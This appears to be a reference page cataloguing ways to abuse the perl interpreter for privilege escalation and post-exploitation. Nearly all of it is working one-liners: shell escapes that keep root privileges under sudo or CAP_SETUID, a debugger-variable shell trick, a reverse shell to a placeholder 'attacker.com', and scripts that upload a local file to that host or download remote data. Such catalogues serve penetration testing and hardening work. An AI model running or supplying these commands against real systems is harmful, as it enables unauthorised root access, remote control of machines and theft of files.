This executable can spawn an interactive system shell.
This function can be performed by any unprivileged user.
perl -e 'exec "/bin/sh"'This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
perl -e 'exec "/bin/sh"'This function is performed bypassing the usual kernel permission checks if the executable has certain capabilities set.
The following capabilities are needed:
CAP_SETUID.
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh"'This function can be performed by any unprivileged user.
PERL5OPT=-d PERL5DB='exec "/bin/sh"' perl /dev/nullThis function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
PERL5OPT=-d PERL5DB='exec "/bin/sh"' perl /dev/nullThis executable can send back a reverse system shell to a listening attacker.
This function can be performed by any unprivileged user.
perl -e 'use Socket;$i="attacker.com";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
perl -e 'use Socket;$i="attacker.com";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'This executable can read data from local files.
This function can be performed by any unprivileged user.
perl -ne print /path/to/input-fileThis function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
perl -ne print /path/to/input-fileThis function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
perl -ne print /path/to/input-fileThis executable can upload local data.
This function can be performed by any unprivileged user.
perl -MIO::Socket::INET -e '$s = new IO::Socket::INET(PeerAddr=>"attacker.com", PeerPort=>80, Proto=>"tcp") or die;open(my $file, "<", "/path/to/input-file") or die;$content = join("", <$file>);close($file);$headers = "POST / HTTP/1.1\r\nHost: attacker.com\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: " . length($content) . "\r\nConnection: close\r\n\r\n";print $s $headers . $content;while (<$s>) { }close($s);'This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
perl -MIO::Socket::INET -e '$s = new IO::Socket::INET(PeerAddr=>"attacker.com", PeerPort=>80, Proto=>"tcp") or die;open(my $file, "<", "/path/to/input-file") or die;$content = join("", <$file>);close($file);$headers = "POST / HTTP/1.1\r\nHost: attacker.com\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: " . length($content) . "\r\nConnection: close\r\n\r\n";print $s $headers . $content;while (<$s>) { }close($s);'This executable can download remote data.
This function can be performed by any unprivileged user.
perl -MIO::Socket::INET -e '$s=new IO::Socket::INET(PeerAddr=>"attacker.com",PeerPort=>80,Proto=>"tcp") or die; print $s "GET /path/to/input-file HTTP/1.1\r\nHost: attacker.com\r\nMetadata: true\r\nConnection: close\r\n\r\n"; open(my $fh, ">", "/path/to/output-file") or die; $in_content = 0; while (<$s>) { if ($in_content) { print $fh $_; } elsif ($_ eq "\r\n") { $in_content = 1; } } close($s); close($fh);'This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
perl -MIO::Socket::INET -e '$s=new IO::Socket::INET(PeerAddr=>"attacker.com",PeerPort=>80,Proto=>"tcp") or die; print $s "GET /path/to/input-file HTTP/1.1\r\nHost: attacker.com\r\nMetadata: true\r\nConnection: close\r\n\r\n"; open(my $fh, ">", "/path/to/output-file") or die; $in_content = 0; while (<$s>) { if ($in_content) { print $fh $_; } elsif ($_ eq "\r\n") { $in_content = 1; } } close($s); close($fh);'